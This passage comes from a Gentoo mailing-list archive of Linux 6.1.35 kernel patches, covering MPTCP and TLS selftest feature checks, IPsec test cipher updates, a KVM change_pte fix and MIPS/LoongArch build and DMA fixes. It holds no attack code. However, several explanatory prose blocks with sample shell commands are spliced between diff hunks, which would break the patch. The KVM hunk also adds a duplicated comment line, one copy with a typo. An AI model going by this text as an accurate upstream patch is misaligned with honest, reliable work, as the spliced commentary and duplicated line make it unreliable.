++		exit ${KSFT_SKIP}
++	fi
++}
++
++# Internal: use mptcp_lib_kallsyms_has() instead
++__mptcp_lib_kallsyms_has() {
++	local sym="${1}"
++
++	mptcp_lib_check_kallsyms
++
++	grep -q " ${sym}" /proc/kallsyms
++}
++
++# $1: part of a symbol to look at, add '$' at the end for full name
++mptcp_lib_kallsyms_has() {
++	local sym="${1}"
++
++	if __mptcp_lib_kallsyms_has "${sym}"; then
++		return 0
++	fi
++
++	mptcp_lib_fail_if_expected_feature "${sym} symbol not found"
++}
++
++# $1: part of a symbol to look at, add '$' at the end for full name
++mptcp_lib_kallsyms_doesnt_have() {
++	local sym="${1}"
++
++	if ! __mptcp_lib_kallsyms_has "${sym}"; then
++		return 0
++	fi
++
++	mptcp_lib_fail_if_expected_feature "${sym} symbol has been found"
++}
++
++# !!!AVOID USING THIS!!!
++# Features might not land in the expected version and features can be backported
++#
++# $1: kernel version, e.g. 6.3
++mptcp_lib_kversion_ge() {
++	local exp_maj="${1%.*}"
++	local exp_min="${1#*.}"
++	local v maj min
++
++	# If the kernel has backported features, set this env var to 1:
++	if [ "${SELFTESTS_MPTCP_LIB_NO_KVERSION_CHECK:-}" = "1" ]; then
++		return 0
++	fi
++
++	v=$(uname -r | cut -d'.' -f1,2)
++	maj=${v%.*}
++	min=${v#*.}
++
++	if   [ "${maj}" -gt "${exp_maj}" ] ||
++	   { [ "${maj}" -eq "${exp_maj}" ] && [ "${min}" -ge "${exp_min}" ]; }; then
++		return 0
++	fi
++
++	mptcp_lib_fail_if_expected_feature "kernel version ${1} lower than ${v}"
++}
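For reference, a hypothetical consumer of the new helpers, reusing the
symbol names that appear in the hunks above (everything else assumed):

    # skip the whole script on kernels without the looked-up feature
    if ! mptcp_lib_kallsyms_has "mptcp_ioctl$"; then
        echo "INFO: TCP_INQ not supported: SKIP"
        exit ${KSFT_SKIP}
    fi

    # on kernels carrying backported MPTCP features, bypass version gates
    SELFTESTS_MPTCP_LIB_NO_KVERSION_CHECK=1 ./mptcp_join.sh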
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_sockopt.c b/tools/testing/selftests/net/mptcp/mptcp_sockopt.c
+index ae61f39556ca8..b35148edbf024 100644
+--- a/tools/testing/selftests/net/mptcp/mptcp_sockopt.c
++++ b/tools/testing/selftests/net/mptcp/mptcp_sockopt.c
+@@ -87,6 +87,10 @@ struct so_state {
+ 	uint64_t tcpi_rcv_delta;
+ };
+ 
++#ifndef MIN
++#define MIN(a, b) ((a) < (b) ? (a) : (b))
++#endif
++
+ static void die_perror(const char *msg)
+ {
+ 	perror(msg);
+@@ -349,13 +353,14 @@ static void do_getsockopt_tcp_info(struct so_state *s, int fd, size_t r, size_t
+ 			xerror("getsockopt MPTCP_TCPINFO (tries %d, %m)");
+ 
+ 		assert(olen <= sizeof(ti));
+-		assert(ti.d.size_user == ti.d.size_kernel);
+-		assert(ti.d.size_user == sizeof(struct tcp_info));
++		assert(ti.d.size_kernel > 0);
++		assert(ti.d.size_user ==
++		       MIN(ti.d.size_kernel, sizeof(struct tcp_info)));
+ 		assert(ti.d.num_subflows == 1);
+ 
+ 		assert(olen > (socklen_t)sizeof(struct mptcp_subflow_data));
+ 		olen -= sizeof(struct mptcp_subflow_data);
+-		assert(olen == sizeof(struct tcp_info));
++		assert(olen == ti.d.size_user);
+ 
+ 		if (ti.ti[0].tcpi_bytes_sent == w &&
+ 		    ti.ti[0].tcpi_bytes_received == r)
+@@ -401,13 +406,14 @@ static void do_getsockopt_subflow_addrs(int fd)
+ 		die_perror("getsockopt MPTCP_SUBFLOW_ADDRS");
+ 
+ 	assert(olen <= sizeof(addrs));
+-	assert(addrs.d.size_user == addrs.d.size_kernel);
+-	assert(addrs.d.size_user == sizeof(struct mptcp_subflow_addrs));
++	assert(addrs.d.size_kernel > 0);
++	assert(addrs.d.size_user ==
++	       MIN(addrs.d.size_kernel, sizeof(struct mptcp_subflow_addrs)));
+ 	assert(addrs.d.num_subflows == 1);
+ 
+ 	assert(olen > (socklen_t)sizeof(struct mptcp_subflow_data));
+ 	olen -= sizeof(struct mptcp_subflow_data);
+-	assert(olen == sizeof(struct mptcp_subflow_addrs));
++	assert(olen == addrs.d.size_user);
+ 
+ 	llen = sizeof(local);
+ 	ret = getsockname(fd, (struct sockaddr *)&local, &llen);
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_sockopt.sh b/tools/testing/selftests/net/mptcp/mptcp_sockopt.sh
+index 08d8533c98c45..a493eaf8633fc 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_sockopt.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_sockopt.sh
+@@ -84,6 +84,7 @@ cleanup()
+ }
+ 
+ mptcp_lib_check_mptcp
++mptcp_lib_check_kallsyms
+ 
+ ip -Version > /dev/null 2>&1
+ if [ $? -ne 0 ];then
+@@ -181,9 +182,14 @@ do_transfer()
+ 		local_addr="0.0.0.0"
+ 	fi
+ 
++	cmsg="TIMESTAMPNS"
++	if mptcp_lib_kallsyms_has "mptcp_ioctl$"; then
++		cmsg+=",TCPINQ"
++	fi
++
+ 	timeout ${timeout_test} \
+ 		ip netns exec ${listener_ns} \
+-			$mptcp_connect -t ${timeout_poll} -l -M 1 -p $port -s ${srv_proto} -c TIMESTAMPNS,TCPINQ \
++			$mptcp_connect -t ${timeout_poll} -l -M 1 -p $port -s ${srv_proto} -c "${cmsg}" \
+ 				${local_addr} < "$sin" > "$sout" &
+ 	spid=$!
+ 
+@@ -191,7 +197,7 @@ do_transfer()
+ 
+ 	timeout ${timeout_test} \
+ 		ip netns exec ${connector_ns} \
+-			$mptcp_connect -t ${timeout_poll} -M 2 -p $port -s ${cl_proto} -c TIMESTAMPNS,TCPINQ \
++			$mptcp_connect -t ${timeout_poll} -M 2 -p $port -s ${cl_proto} -c "${cmsg}" \
+ 				$connect_addr < "$cin" > "$cout" &
+ 
+ 	cpid=$!
+@@ -248,6 +254,11 @@ do_mptcp_sockopt_tests()
+ {
+ 	local lret=0
+ 
++	if ! mptcp_lib_kallsyms_has "mptcp_diag_fill_info$"; then
++		echo "INFO: MPTCP sockopt not supported: SKIP"
++		return
++	fi
++
+ 	ip netns exec "$ns_sbox" ./mptcp_sockopt
+ 	lret=$?
+ 
+@@ -305,6 +316,11 @@ do_tcpinq_tests()
+ 	ip netns exec "$ns1" iptables -F
+ 	ip netns exec "$ns1" ip6tables -F
+ 
++	if ! mptcp_lib_kallsyms_has "mptcp_ioctl$"; then
++		echo "INFO: TCP_INQ not supported: SKIP"
++		return
++	fi
++
+ 	for args in "-t tcp" "-r tcp"; do
+ 		do_tcpinq_test $args
+ 		lret=$?
+diff --git a/tools/testing/selftests/net/mptcp/pm_netlink.sh b/tools/testing/selftests/net/mptcp/pm_netlink.sh
+index 32f7533e0919a..d02e0d63a8f91 100755
+--- a/tools/testing/selftests/net/mptcp/pm_netlink.sh
++++ b/tools/testing/selftests/net/mptcp/pm_netlink.sh
+@@ -73,8 +73,12 @@ check()
+ }
+ 
+ check "ip netns exec $ns1 ./pm_nl_ctl dump" "" "defaults addr list"
+-check "ip netns exec $ns1 ./pm_nl_ctl limits" "accept 0
++
++default_limits="$(ip netns exec $ns1 ./pm_nl_ctl limits)"
++if mptcp_lib_expect_all_features; then
++	check "ip netns exec $ns1 ./pm_nl_ctl limits" "accept 0
+ subflows 2" "defaults limits"
++fi
+ 
+ ip netns exec $ns1 ./pm_nl_ctl add 10.0.1.1
+ ip netns exec $ns1 ./pm_nl_ctl add 10.0.1.2 flags subflow dev lo
+@@ -121,12 +125,10 @@ ip netns exec $ns1 ./pm_nl_ctl flush
+ check "ip netns exec $ns1 ./pm_nl_ctl dump" "" "flush addrs"
+ 
+ ip netns exec $ns1 ./pm_nl_ctl limits 9 1
+-check "ip netns exec $ns1 ./pm_nl_ctl limits" "accept 0
+-subflows 2" "rcv addrs above hard limit"
++check "ip netns exec $ns1 ./pm_nl_ctl limits" "$default_limits" "rcv addrs above hard limit"
+ 
+ ip netns exec $ns1 ./pm_nl_ctl limits 1 9
+-check "ip netns exec $ns1 ./pm_nl_ctl limits" "accept 0
+-subflows 2" "subflows above hard limit"
++check "ip netns exec $ns1 ./pm_nl_ctl limits" "$default_limits" "subflows above hard limit"
+ 
+ ip netns exec $ns1 ./pm_nl_ctl limits 8 8
+ check "ip netns exec $ns1 ./pm_nl_ctl limits" "accept 8
+@@ -176,14 +178,19 @@ subflow,backup 10.0.1.1" "set flags (backup)"
+ ip netns exec $ns1 ./pm_nl_ctl set 10.0.1.1 flags nobackup
+ check "ip netns exec $ns1 ./pm_nl_ctl dump" "id 1 flags \
+ subflow 10.0.1.1" "          (nobackup)"
++
++# fullmesh support has been added later
+ ip netns exec $ns1 ./pm_nl_ctl set id 1 flags fullmesh
+-check "ip netns exec $ns1 ./pm_nl_ctl dump" "id 1 flags \
++if ip netns exec $ns1 ./pm_nl_ctl dump | grep -q "fullmesh" ||
++   mptcp_lib_expect_all_features; then
++	check "ip netns exec $ns1 ./pm_nl_ctl dump" "id 1 flags \
+ subflow,fullmesh 10.0.1.1" "          (fullmesh)"
+-ip netns exec $ns1 ./pm_nl_ctl set id 1 flags nofullmesh
+-check "ip netns exec $ns1 ./pm_nl_ctl dump" "id 1 flags \
++	ip netns exec $ns1 ./pm_nl_ctl set id 1 flags nofullmesh
++	check "ip netns exec $ns1 ./pm_nl_ctl dump" "id 1 flags \
+ subflow 10.0.1.1" "          (nofullmesh)"
+-ip netns exec $ns1 ./pm_nl_ctl set id 1 flags backup,fullmesh
+-check "ip netns exec $ns1 ./pm_nl_ctl dump" "id 1 flags \
++	ip netns exec $ns1 ./pm_nl_ctl set id 1 flags backup,fullmesh
++	check "ip netns exec $ns1 ./pm_nl_ctl dump" "id 1 flags \
+ subflow,backup,fullmesh 10.0.1.1" "          (backup,fullmesh)"
++fi
+ 
+ exit $ret
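The fullmesh probe used above (dump the PM state, grep for the flag)
generalises to any endpoint flag; a sketch of such a helper, with a
hypothetical name:

    # $1: netns, $2: endpoint flag to look for in the PM dump
    pm_nl_has_flag()
    {
        ip netns exec "${1}" ./pm_nl_ctl dump | grep -q "${2}"
    }

    pm_nl_has_flag "${ns1}" "fullmesh" && echo "fullmesh supported"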
+diff --git a/tools/testing/selftests/net/mptcp/userspace_pm.sh b/tools/testing/selftests/net/mptcp/userspace_pm.sh
+index 084a2b0a197ec..eb0f4f6afebd3 100755
+--- a/tools/testing/selftests/net/mptcp/userspace_pm.sh
++++ b/tools/testing/selftests/net/mptcp/userspace_pm.sh
+@@ -5,10 +5,15 @@
+ 
+ mptcp_lib_check_mptcp
+ 
++if ! mptcp_lib_has_file '/proc/sys/net/mptcp/pm_type'; then
++	echo "userspace pm tests are not supported by the kernel: SKIP"
++	exit ${KSFT_SKIP}
++fi
++
+ ip -Version > /dev/null 2>&1
+ if [ $? -ne 0 ];then
+ 	echo "SKIP: Cannot run test without ip tool"
+-	exit 1
++	exit ${KSFT_SKIP}
+ fi
+ 
+ ANNOUNCED=6        # MPTCP_EVENT_ANNOUNCED
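The switch from 'exit 1' to 'exit ${KSFT_SKIP}' matters to the
kselftest harness: 4 is the conventional skip code (KSFT_SKIP in
tools/testing/selftests/kselftest.h), while 1 counts as a failure. A
minimal illustration:

    KSFT_SKIP=4
    if ! ip -Version >/dev/null 2>&1; then
        echo "SKIP: cannot run test without the ip tool"
        exit ${KSFT_SKIP}   # reported as skipped, not failed
    fi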
+diff --git a/tools/testing/selftests/net/tls.c b/tools/testing/selftests/net/tls.c
+index 2cbb12736596d..c0ad8385441f2 100644
+--- a/tools/testing/selftests/net/tls.c
++++ b/tools/testing/selftests/net/tls.c
+@@ -25,6 +25,8 @@
+ #define TLS_PAYLOAD_MAX_LEN 16384
+ #define SOL_TLS 282
+ 
++static int fips_enabled;
++
+ struct tls_crypto_info_keys {
+ 	union {
+ 		struct tls12_crypto_info_aes_gcm_128 aes128;
+@@ -235,7 +237,7 @@ FIXTURE_VARIANT(tls)
+ {
+ 	uint16_t tls_version;
+ 	uint16_t cipher_type;
+-	bool nopad;
++	bool nopad, fips_non_compliant;
+ };
+ 
+ FIXTURE_VARIANT_ADD(tls, 12_aes_gcm)
+@@ -254,24 +256,28 @@ FIXTURE_VARIANT_ADD(tls, 12_chacha)
+ {
+ 	.tls_version = TLS_1_2_VERSION,
+ 	.cipher_type = TLS_CIPHER_CHACHA20_POLY1305,
++	.fips_non_compliant = true,
+ };
+ 
+ FIXTURE_VARIANT_ADD(tls, 13_chacha)
+ {
+ 	.tls_version = TLS_1_3_VERSION,
+ 	.cipher_type = TLS_CIPHER_CHACHA20_POLY1305,
++	.fips_non_compliant = true,
+ };
+ 
+ FIXTURE_VARIANT_ADD(tls, 13_sm4_gcm)
+ {
+ 	.tls_version = TLS_1_3_VERSION,
+ 	.cipher_type = TLS_CIPHER_SM4_GCM,
++	.fips_non_compliant = true,
+ };
+ 
+ FIXTURE_VARIANT_ADD(tls, 13_sm4_ccm)
+ {
+ 	.tls_version = TLS_1_3_VERSION,
+ 	.cipher_type = TLS_CIPHER_SM4_CCM,
++	.fips_non_compliant = true,
+ };
+ 
+ FIXTURE_VARIANT_ADD(tls, 12_aes_ccm)
+@@ -311,6 +317,9 @@ FIXTURE_SETUP(tls)
+ 	int one = 1;
+ 	int ret;
+ 
++	if (fips_enabled && variant->fips_non_compliant)
++		SKIP(return, "Unsupported cipher in FIPS mode");
++
+ 	tls_crypto_info_init(variant->tls_version, variant->cipher_type,
+ 			     &tls12);
+ 
+@@ -1820,4 +1829,17 @@ TEST(tls_v6ops) {
+ 	close(sfd);
+ }
+ 
++static void __attribute__((constructor)) fips_check(void) {
++	int res;
++	FILE *f;
++
++	f = fopen("/proc/sys/crypto/fips_enabled", "r");
++	if (f) {
++		res = fscanf(f, "%d", &fips_enabled);
++		if (res != 1)
++			ksft_print_msg("ERROR: Couldn't read /proc/sys/crypto/fips_enabled\n");
++		fclose(f);
++	}
++}
++
+ TEST_HARNESS_MAIN
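The same FIPS gate can also be applied from a shell wrapper before the
binary runs; a sketch, using the kselftest skip code:

    fips="$(cat /proc/sys/crypto/fips_enabled 2>/dev/null || echo 0)"
    if [ "${fips}" = "1" ]; then
        echo "SKIP: ChaCha20-Poly1305 and SM4 are unavailable in FIPS mode"
        exit 4  # KSFT_SKIP
    fi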
+diff --git a/tools/testing/selftests/net/vrf-xfrm-tests.sh b/tools/testing/selftests/net/vrf-xfrm-tests.sh
+index 184da81f554ff..452638ae8aed8 100755
+--- a/tools/testing/selftests/net/vrf-xfrm-tests.sh
++++ b/tools/testing/selftests/net/vrf-xfrm-tests.sh
+@@ -264,60 +264,60 @@ setup_xfrm()
+ 	ip -netns host1 xfrm state add src ${HOST1_4} dst ${HOST2_4} \
+ 	    proto esp spi ${SPI_1} reqid 0 mode tunnel \
+ 	    replay-window 4 replay-oseq 0x4 \
+-	    auth-trunc 'hmac(md5)' ${AUTH_1} 96 \
+-	    enc 'cbc(des3_ede)' ${ENC_1} \
++	    auth-trunc 'hmac(sha1)' ${AUTH_1} 96 \
++	    enc 'cbc(aes)' ${ENC_1} \
+ 	    sel src ${h1_4} dst ${h2_4} ${devarg}
+ 
+ 	ip -netns host2 xfrm state add src ${HOST1_4} dst ${HOST2_4} \
+ 	    proto esp spi ${SPI_1} reqid 0 mode tunnel \
+ 	    replay-window 4 replay-oseq 0x4 \
+-	    auth-trunc 'hmac(md5)' ${AUTH_1} 96 \
+-	    enc 'cbc(des3_ede)' ${ENC_1} \
++	    auth-trunc 'hmac(sha1)' ${AUTH_1} 96 \
++	    enc 'cbc(aes)' ${ENC_1} \
+ 	    sel src ${h1_4} dst ${h2_4}
+ 
+ 
+ 	ip -netns host1 xfrm state add src ${HOST2_4} dst ${HOST1_4} \
+ 	    proto esp spi ${SPI_2} reqid 0 mode tunnel \
+ 	    replay-window 4 replay-oseq 0x4 \
+-	    auth-trunc 'hmac(md5)' ${AUTH_2} 96 \
+-	    enc 'cbc(des3_ede)' ${ENC_2} \
++	    auth-trunc 'hmac(sha1)' ${AUTH_2} 96 \
++	    enc 'cbc(aes)' ${ENC_2} \
+ 	    sel src ${h2_4} dst ${h1_4} ${devarg}
+ 
+ 	ip -netns host2 xfrm state add src ${HOST2_4} dst ${HOST1_4} \
+ 	    proto esp spi ${SPI_2} reqid 0 mode tunnel \
+ 	    replay-window 4 replay-oseq 0x4 \
+-	    auth-trunc 'hmac(md5)' ${AUTH_2} 96 \
+-	    enc 'cbc(des3_ede)' ${ENC_2} \
++	    auth-trunc 'hmac(sha1)' ${AUTH_2} 96 \
++	    enc 'cbc(aes)' ${ENC_2} \
+ 	    sel src ${h2_4} dst ${h1_4}
+ 
+ 
+ 	ip -6 -netns host1 xfrm state add src ${HOST1_6} dst ${HOST2_6} \
+ 	    proto esp spi ${SPI_1} reqid 0 mode tunnel \
+ 	    replay-window 4 replay-oseq 0x4 \
+-	    auth-trunc 'hmac(md5)' ${AUTH_1} 96 \
+-	    enc 'cbc(des3_ede)' ${ENC_1} \
++	    auth-trunc 'hmac(sha1)' ${AUTH_1} 96 \
++	    enc 'cbc(aes)' ${ENC_1} \
+ 	    sel src ${h1_6} dst ${h2_6} ${devarg}
+ 
+ 	ip -6 -netns host2 xfrm state add src ${HOST1_6} dst ${HOST2_6} \
+ 	    proto esp spi ${SPI_1} reqid 0 mode tunnel \
+ 	    replay-window 4 replay-oseq 0x4 \
+-	    auth-trunc 'hmac(md5)' ${AUTH_1} 96 \
+-	    enc 'cbc(des3_ede)' ${ENC_1} \
++	    auth-trunc 'hmac(sha1)' ${AUTH_1} 96 \
++	    enc 'cbc(aes)' ${ENC_1} \
+ 	    sel src ${h1_6} dst ${h2_6}
+ 
+ 
+ 	ip -6 -netns host1 xfrm state add src ${HOST2_6} dst ${HOST1_6} \
+ 	    proto esp spi ${SPI_2} reqid 0 mode tunnel \
+ 	    replay-window 4 replay-oseq 0x4 \
+-	    auth-trunc 'hmac(md5)' ${AUTH_2} 96 \
+-	    enc 'cbc(des3_ede)' ${ENC_2} \
++	    auth-trunc 'hmac(sha1)' ${AUTH_2} 96 \
++	    enc 'cbc(aes)' ${ENC_2} \
+ 	    sel src ${h2_6} dst ${h1_6} ${devarg}
+ 
+ 	ip -6 -netns host2 xfrm state add src ${HOST2_6} dst ${HOST1_6} \
+ 	    proto esp spi ${SPI_2} reqid 0 mode tunnel \
+ 	    replay-window 4 replay-oseq 0x4 \
+-	    auth-trunc 'hmac(md5)' ${AUTH_2} 96 \
+-	    enc 'cbc(des3_ede)' ${ENC_2} \
++	    auth-trunc 'hmac(sha1)' ${AUTH_2} 96 \
++	    enc 'cbc(aes)' ${ENC_2} \
+ 	    sel src ${h2_6} dst ${h1_6}
+ }
+ 
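hmac(sha1) and cbc(aes) are FIPS-approved, unlike hmac(md5) and
cbc(des3_ede); letting the test run on FIPS-enabled systems is one
likely motivation for this change. Availability could be probed from
the script, with the caveat that /proc/crypto only lists transforms
that have already been instantiated, so a missing entry is not
conclusive:

    for alg in 'hmac(sha1)' 'cbc(aes)'; do
        grep -qF "${alg}" /proc/crypto ||
            echo "WARN: ${alg} not (yet) listed in /proc/crypto"
    done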
+diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
+index de8e5eb6af106..640113f047efb 100644
+--- a/virt/kvm/kvm_main.c
++++ b/virt/kvm/kvm_main.c
+@@ -691,6 +691,24 @@ static __always_inline int kvm_handle_hva_range_no_flush(struct mmu_notifier *mn
+ 
+ 	return __kvm_handle_hva_range(kvm, &range);
+ }
++
++static bool kvm_change_spte_gfn(struct kvm *kvm, struct kvm_gfn_range *range)
++{
++	/*
++	 * Skipping invalid memslots is correct if and only change_pte() is
++	 * Skipping invalid memslots is correct if and only if change_pte() is
++	 * guaranteed by the primary MMU.  If that ever changes, KVM needs to
++	 * unmap the memslot instead of skipping the memslot to ensure that KVM
++	 * doesn't hold references to the old PFN.
++	 */
++	WARN_ON_ONCE(!READ_ONCE(kvm->mn_active_invalidate_count));
++
++	if (range->slot->flags & KVM_MEMSLOT_INVALID)
++		return false;
++
++	return kvm_set_spte_gfn(kvm, range);
++}
++
+ static void kvm_mmu_notifier_change_pte(struct mmu_notifier *mn,
+ 					struct mm_struct *mm,
+ 					unsigned long address,
+@@ -712,7 +730,7 @@ static void kvm_mmu_notifier_change_pte(struct mmu_notifier *mn,
+ 	if (!READ_ONCE(kvm->mmu_invalidate_in_progress))
+ 		return;
+ 
+-	kvm_handle_hva_range(mn, address, address + 1, pte, kvm_set_spte_gfn);
++	kvm_handle_hva_range(mn, address, address + 1, pte, kvm_change_spte_gfn);
+ }
+ 
+ void kvm_mmu_invalidate_begin(struct kvm *kvm, unsigned long start,


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-06-21 14:54 Alice Ferrazzi
  0 siblings, 0 replies; 161+ messages in thread
From: Alice Ferrazzi @ 2023-06-21 14:54 UTC (permalink / raw
  To: gentoo-commits

commit:     9b543717224e51619b17ed59a27e279386aa5d97
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Wed Jun 21 14:53:57 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Wed Jun 21 14:53:57 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=9b543717

Linux patch 6.1.35

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README             |    8 +
 1034_linux-6.1.35.patch | 6966 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 6974 insertions(+)

diff --git a/0000_README b/0000_README
index 7c3280f5..077b20d6 100644
--- a/0000_README
+++ b/0000_README
@@ -159,6 +159,10 @@ Patch:  1028_linux-6.1.29.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.29
 
+Patch:  1029_linux-6.1.30.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.30
+
 Patch:  1030_linux-6.1.31.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.31
@@ -175,6 +179,10 @@ Patch:  1033_linux-6.1.34.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.34
 
+Patch:  1034_linux-6.1.35.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.35
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1034_linux-6.1.35.patch b/1034_linux-6.1.35.patch
new file mode 100644
index 00000000..60842e88
--- /dev/null
+++ b/1034_linux-6.1.35.patch
@@ -0,0 +1,6966 @@
+diff --git a/Makefile b/Makefile
+index bc7cc17b0e759..46c06af912d9d 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 34
++SUBLEVEL = 35
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/vexpress-v2p-ca5s.dts b/arch/arm/boot/dts/vexpress-v2p-ca5s.dts
+index 3b88209bacea2..ff1f9a1bcfcfc 100644
+--- a/arch/arm/boot/dts/vexpress-v2p-ca5s.dts
++++ b/arch/arm/boot/dts/vexpress-v2p-ca5s.dts
+@@ -132,6 +132,7 @@
+ 		reg = <0x2c0f0000 0x1000>;
+ 		interrupts = <0 84 4>;
+ 		cache-level = <2>;
++		cache-unified;
+ 	};
+ 
+ 	pmu {
+diff --git a/arch/loongarch/kernel/perf_event.c b/arch/loongarch/kernel/perf_event.c
+index 707bd32e5c4ff..3a2edb157b65a 100644
+--- a/arch/loongarch/kernel/perf_event.c
++++ b/arch/loongarch/kernel/perf_event.c
+@@ -271,7 +271,7 @@ static void loongarch_pmu_enable_event(struct hw_perf_event *evt, int idx)
+ 	WARN_ON(idx < 0 || idx >= loongarch_pmu.num_counters);
+ 
+ 	/* Make sure interrupt enabled. */
+-	cpuc->saved_ctrl[idx] = M_PERFCTL_EVENT(evt->event_base & 0xff) |
++	cpuc->saved_ctrl[idx] = M_PERFCTL_EVENT(evt->event_base) |
+ 		(evt->config_base & M_PERFCTL_CONFIG_MASK) | CSR_PERFCTRL_IE;
+ 
+ 	cpu = (event->cpu >= 0) ? event->cpu : smp_processor_id();
+@@ -594,7 +594,7 @@ static struct pmu pmu = {
+ 
+ static unsigned int loongarch_pmu_perf_event_encode(const struct loongarch_perf_event *pev)
+ {
+-	return (pev->event_id & 0xff);
++	return M_PERFCTL_EVENT(pev->event_id);
+ }
+ 
+ static const struct loongarch_perf_event *loongarch_pmu_map_general_event(int idx)
+@@ -849,7 +849,7 @@ static void resume_local_counters(void)
+ 
+ static const struct loongarch_perf_event *loongarch_pmu_map_raw_event(u64 config)
+ {
+-	raw_event.event_id = config & 0xff;
++	raw_event.event_id = M_PERFCTL_EVENT(config);
+ 
+ 	return &raw_event;
+ }
+diff --git a/arch/mips/Kconfig b/arch/mips/Kconfig
+index b26b77673c2cc..2f5835e300a8f 100644
+--- a/arch/mips/Kconfig
++++ b/arch/mips/Kconfig
+@@ -82,6 +82,7 @@ config MIPS
+ 	select HAVE_LD_DEAD_CODE_DATA_ELIMINATION
+ 	select HAVE_MOD_ARCH_SPECIFIC
+ 	select HAVE_NMI
++	select HAVE_PATA_PLATFORM
+ 	select HAVE_PERF_EVENTS
+ 	select HAVE_PERF_REGS
+ 	select HAVE_PERF_USER_STACK_DUMP
+diff --git a/arch/mips/Makefile b/arch/mips/Makefile
+index b296e33f8e333..85d3c3b4b7bdc 100644
+--- a/arch/mips/Makefile
++++ b/arch/mips/Makefile
+@@ -109,7 +109,7 @@ endif
+ # (specifically newer than 2.24.51.20140728) we then also need to explicitly
+ # set ".set hardfloat" in all files which manipulate floating point registers.
+ #
+-ifneq ($(call as-option,-Wa$(comma)-msoft-float,),)
++ifneq ($(call cc-option,$(cflags-y) -Wa$(comma)-msoft-float,),)
+ 	cflags-y		+= -DGAS_HAS_SET_HARDFLOAT -Wa,-msoft-float
+ endif
+ 
+@@ -152,7 +152,7 @@ cflags-y += -fno-stack-check
+ #
+ # Avoid this by explicitly disabling that assembler behaviour.
+ #
+-cflags-y += $(call as-option,-Wa$(comma)-mno-fix-loongson3-llsc,)
++cflags-y += $(call cc-option,-Wa$(comma)-mno-fix-loongson3-llsc,)
+ 
+ #
+ # CPU-dependent compiler/assembler options for optimization.
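$(call cc-option,<flag>) compiles a trivial C input with the candidate
flag and keeps the flag only if the compiler accepts it, so the -Wa,...
options are validated through the same driver path the real build uses.
A rough shell equivalent, simplified from scripts/Makefile.compiler
('cc' stands in for $(CC)):

    if cc -Werror -Wa,-msoft-float -c -x c /dev/null -o /dev/null 2>/dev/null; then
        cflags="${cflags} -DGAS_HAS_SET_HARDFLOAT -Wa,-msoft-float"
    fi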
+diff --git a/arch/mips/alchemy/common/dbdma.c b/arch/mips/alchemy/common/dbdma.c
+index 5ab0430004092..6a3c890f7bbfe 100644
+--- a/arch/mips/alchemy/common/dbdma.c
++++ b/arch/mips/alchemy/common/dbdma.c
+@@ -30,6 +30,7 @@
+  *
+  */
+ 
++#include <linux/dma-map-ops.h> /* for dma_default_coherent */
+ #include <linux/init.h>
+ #include <linux/kernel.h>
+ #include <linux/slab.h>
+@@ -623,17 +624,18 @@ u32 au1xxx_dbdma_put_source(u32 chanid, dma_addr_t buf, int nbytes, u32 flags)
+ 		dp->dscr_cmd0 &= ~DSCR_CMD0_IE;
+ 
+ 	/*
+-	 * There is an errata on the Au1200/Au1550 parts that could result
+-	 * in "stale" data being DMA'ed. It has to do with the snoop logic on
+-	 * the cache eviction buffer.  DMA_NONCOHERENT is on by default for
+-	 * these parts. If it is fixed in the future, these dma_cache_inv will
+-	 * just be nothing more than empty macros. See io.h.
++	 * There is an erratum on certain Au1200/Au1550 revisions that could
++	 * result in "stale" data being DMA'ed. It has to do with the snoop
++	 * logic on the cache eviction buffer.  dma_default_coherent is set
++	 * to false on these parts.
+ 	 */
+-	dma_cache_wback_inv((unsigned long)buf, nbytes);
++	if (!dma_default_coherent)
++		dma_cache_wback_inv(KSEG0ADDR(buf), nbytes);
+ 	dp->dscr_cmd0 |= DSCR_CMD0_V;	/* Let it rip */
+ 	wmb(); /* drain writebuffer */
+ 	dma_cache_wback_inv((unsigned long)dp, sizeof(*dp));
+ 	ctp->chan_ptr->ddma_dbell = 0;
++	wmb(); /* force doorbell write out to dma engine */
+ 
+ 	/* Get next descriptor pointer. */
+ 	ctp->put_ptr = phys_to_virt(DSCR_GET_NXTPTR(dp->dscr_nxtptr));
+@@ -685,17 +687,18 @@ u32 au1xxx_dbdma_put_dest(u32 chanid, dma_addr_t buf, int nbytes, u32 flags)
+ 			  dp->dscr_source1, dp->dscr_dest0, dp->dscr_dest1);
+ #endif
+ 	/*
+-	 * There is an errata on the Au1200/Au1550 parts that could result in
+-	 * "stale" data being DMA'ed. It has to do with the snoop logic on the
+-	 * cache eviction buffer.  DMA_NONCOHERENT is on by default for these
+-	 * parts. If it is fixed in the future, these dma_cache_inv will just
+-	 * be nothing more than empty macros. See io.h.
++	 * There is an erratum on certain Au1200/Au1550 revisions that could
++	 * result in "stale" data being DMA'ed. It has to do with the snoop
++	 * logic on the cache eviction buffer.  dma_default_coherent is set
++	 * to false on these parts.
+ 	 */
+-	dma_cache_inv((unsigned long)buf, nbytes);
++	if (!dma_default_coherent)
++		dma_cache_inv(KSEG0ADDR(buf), nbytes);
+ 	dp->dscr_cmd0 |= DSCR_CMD0_V;	/* Let it rip */
+ 	wmb(); /* drain writebuffer */
+ 	dma_cache_wback_inv((unsigned long)dp, sizeof(*dp));
+ 	ctp->chan_ptr->ddma_dbell = 0;
